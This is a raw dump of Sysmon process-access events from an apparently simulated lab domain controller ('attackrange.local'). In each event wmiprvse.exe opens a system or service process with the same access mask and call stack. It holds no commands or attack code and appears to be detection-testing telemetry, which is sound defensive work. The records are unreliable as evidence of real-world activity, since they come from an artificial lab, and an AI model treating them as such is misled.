15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025682Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025681Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025680Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025679Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025678Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025677Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025676Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025675Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025674Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025673Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025672Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025671Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025670Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025669Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025668Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025667Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025666Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025665Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025664Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025663Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 